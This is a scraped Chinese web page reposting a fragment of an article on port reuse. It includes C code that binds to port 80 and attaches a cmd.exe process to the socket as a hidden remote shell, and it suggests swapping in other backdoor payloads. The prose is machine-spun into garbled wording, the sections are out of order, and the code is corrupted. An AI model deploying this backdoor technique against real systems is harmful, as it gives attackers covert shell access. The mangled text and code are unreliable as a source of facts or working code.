作家
登录

聊聊端口复用的实现和坑点

作者: 来源: 2017-11-08 14:02:17 阅读 我要评论

在这个中,也有例外,比如apache和其他运行在应用层上的办事器中心件,在他们开放的端口上是可以进行端口复竽暌姑的,不过如许,端口复竽暌姑典范领巾小了很多。

设置IP和复竽暌姑端标语,IP和端标语视情况而定。

  1. sockaddr_in sockaaddr; 
  2.    sockaaddr.sin_addr.s_addr = inet_addr("192.168.1.8"); 
  3.    sockaaddr.sin_family = AF_INET; 
  4.    sockaaddr.sin_port = htons(80); 

设置反弹的法度榜样,以 cmd.exe 为例,起首创建窗口特点并初始化为 CreateProcess() 创建过程做预备,当 cmd.exe 的过程创建成功后,以 socket 进行数据通信交换,这里还可以换成其他法度榜样,比如 Shellcode 小马接收器、写入文件法度榜样、后门等等。

  1. STARTUPINFO si; 
  2.  ZeroMemory(&si, sizeof(si)); 
  3.  si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; 
  4.  si.hStdError = si.hStdInput = si.hStdOutput = (void*)recvSock; 
  5.  
  6.  char cmdLine[] = "cmd"
  7.  PROCESS_INFORMATION pi; 
  8.  ret = CreateProcess(NULL, cmdLine, NULLNULL, 1, 0, NULLNULL, &si, π); 

0x05总结

在端口复竽暌姑技巧中,确切有很多的坑点。其实只要我们知道个中的特点,绕过也是不难的。端口复竽暌姑在Linux体系中我认为还好,然则端口复竽暌姑这个技巧放到Windows体系中,我认为端口复竽暌姑就似乎是千斤顶,换备胎的时刻可以用下,弗成长时光应用,不然会出现问题的(^__^)。

【编辑推荐】

  1. 老难题新思路:移动开辟策略——原生与混淆孰优孰劣?
  2. 移动开辟每周浏览清单:iOS多线程安然、构建Android MVVM应用框架
  3. 移动开辟第五:新法度榜样员最爱好的6种岗亭
  4. 移动开辟主流框架的拔取以及技巧选型筹划解析
  5. 为安卓开辟者介绍的移动开辟框架 Flutter
【义务编辑:未丽燕 TEL:(010)68476606】

0x04 端口复竽暌姑源码分析



  推荐阅读

  Netcraft 10月Web服务器排名:Nginx首超微软排第二

Netcraft 宣布了2017年10月 Web 办事器查询拜访申报,本月 Netcraft一共统计了1,815,237,491 个站点和 6,886,362 台收集计算机,排名前三的依然是 Microsoft、Apache 和 nginx 。在 10 月>>>详细阅读


本文标题:聊聊端口复用的实现和坑点

地址:http://www.17bianji.com/lsqh/38630.html

关键词: 探索发现

乐购科技部分新闻及文章转载自互联网,供读者交流和学习,若有涉及作者版权等问题请及时与我们联系,以便更正、删除或按规定办理。感谢所有提供资讯的网站,欢迎各类媒体与乐购科技进行文章共享合作。

网友点评
自媒体专栏

评论

热度

精彩导读
栏目ID=71的表不存在(操作类型=0)